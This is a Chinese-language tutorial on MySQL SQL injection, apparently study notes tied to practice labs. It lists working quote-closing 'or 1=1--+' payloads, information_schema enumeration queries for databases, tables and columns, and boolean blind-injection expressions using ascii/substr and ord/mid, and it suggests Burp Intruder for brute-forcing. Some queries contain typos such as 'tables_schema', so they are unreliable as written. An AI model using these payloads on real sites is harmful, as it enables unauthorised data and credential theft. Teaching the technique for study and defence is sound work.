sql注入

0x00 什么是SQL

结构化查询语言(Structured Query Language)简称SQL，是一种特殊目的的编程语言，是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理关系数据库系统；同时也是数据库脚本文件的扩展名。

0x01 MYSQL简介

MYSQL是一种关系数据库管理系统，关系数据库将数据库保存在不同表中，可以提高速度并提高灵活性。


MYSQL所使用的SQL语言适用于访问数据库的最常用语言

0x02 MYSQL数据库结构

数据库——表——列——字段

0x03 数据库查询

SQL基本语句

• Show databases;(显示是所有数据库)
  
• Use xxx(数据库名字)选择数据库==use dvwa;
  
• Show tables;(显示所有表单)
  
• SELECT列名称FROM表名称WHERE条件#从表中获取数据
  select*from users where name= ‘test’;
• updata表名称set列名称=新值where条件#修改表中某值
• insert into表名称(字段名称)values(值1，值2，……)
  eg:insert into user(name,pass)values(‘hack’,’555’);
• delete from (表) where 条件#删除一个字段
  Eg:delete from user where name=’字段名’
• union select 联合查询#union操作符用于合并两个或多个select语句结果集。union内部每个select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每个select语句中的列的顺序必须相同。

  其他语句

  1.注释符：#，–+，//
  
  2.order by 语句用于对结果集进行排序，注入攻击中用于测试列的数量。

  0x04 什么是sql注入

  •攻击者通过构造恶意的SQL语句，使得数据库执行危险操作。

•比如本来是查询书籍的语句，结果显示了用户的密码

•比如直接用数据库写入文件。

SQL注入产生的原因

• 程序员写入了一个可以被黑客控制并任意修改的SQL语句，使得黑客执行他所想进行的查询或者操作。

  0x05 SQL注入种类

  •▲基于错误的SQL注入

•▲联合查询的类型

•▲堆查询注射

•▲SQL盲注•

•基于布尔SQL盲注

•基于时间的SQL盲注

•基于报错的SQL盲注

•基于如何处理输入的SQL查询（数据类型）

•基于字符串

•数字或整数为基础的

基于程度和顺序的注入(哪里发生了影响)

★一阶注射

★二阶注射

• 一阶注射是指输入的注射语句对WEB直接产生了影响
  
• 二阶注入类似存储型XSS，是指输入提交的语句，无法直接对WEB应用程序产生影响，通过其它的辅助间接的对WEB产生危害，这样的就被称为是二阶注入.
• 基于注入点位置上的；通过用户输入的表单域的注射。
• 传统的POST/GET；通过cookie注射；cookie=xxxx
• 通过服务器变量注射。(基于头部信息的注射)；useragent=

  0x06 系统函数

1. version()–MySQL版本
   
2. user()–数据库用户名
   
3. database()–数据库名
   
4. @@datadir–数据库路径
   
5. @@version_compile_os–操作系统版本
   
   

---

字符串函数具体介绍有些多所以搬运一下http://www.cnblogs.com/lcamry/p/5715634.html但是其实就是知道三个函数的用法

1. concat(str1,str2,…)————没有分割符地连接字符串
2. concat_ws(separator,str1,str2,…)————有分隔符的连接字符串
3. group_concat(str1,str2,…)————连接一个组的所有字符串，并以逗号分隔数据

   0x07 注入流程

   获取数据库————数据表————列————数据
   
   在可以提交的参数后添加：
   
   •or1=1–+

•’or1=1–+

•”or1=1–+

•)or1=1–+

•’)or1=1–+

•”)or1=1–+

•”))or1=1–+

考虑两个点，一个是闭合前面你的‘另一个是处理后面的’，一般采用两种思路，闭合后面的引号或者注释掉，注释掉采用–+或者#（%23）

Step1：找出数据库

•数据库：

Select schema_name from information_schema.schemata

Step2:表

select table_name from information_schema.tables where table_schema=‘security’;
//假设数据库名字为security

Step3:列

•猜某表的所有列

•Select column_name from information_schema.columns where table_name=’users’
假设表名为users

Step4获取内容：

•获取某列的内容

•Select * from **
information_schema的说明

•information_schema数据库是MySQL自带的，它提供了访问数据库元数据的方式。什么是元数据呢？元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。

•在MySQL中，把
information_schema 看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权
限等。在INFORMATION_SCHEMA中，有数个只读表。它们实际上是视图，而不是基本表，因此，你将无法看到与之相关的任何文件。

information_schema数据库表说明:

•SCHEMATA表：提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

•TABLES表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是show tables from schema.name的结果取之此表。

•COLUMNS表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

###0x08 盲注

• 何为盲注
  盲注就是在sql注入过程中，选择数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试。
• 盲注分为三类
  基于布尔类型SQL注入；基于时间的SQL盲注；基于报错的SQL盲注

  0x09 基于布尔SQL盲注—构造逻辑判断

  基本函数

• left(a,x)从字符串a中街区前x位
• substr(a,b,c)从字符串a中b位置开始截取c长度
• ascii(a)把字符a转换成ascii码
• mid(a,b,c)从字符串a的b位截取c位长度
• ord(a)同ascii作用

  盲注语句

• 利用ascii和substr
  ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 --+
  
  通过ascii(x)转换成ascii码和最后的数字进行比较。根据返回值的真假可知道第一个字符。同理也可以替换成mid和ord函数。
• mid和ord函数
  ORD(MID((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))>98

  注入思路

  只需从ascii码的1遍历到127即可知道第一位的字符，然后再令substr(a,2,1)或者mid(a,2,1),来获取第二位。
  
  爆破就可以用常见burp的intruder进行爆破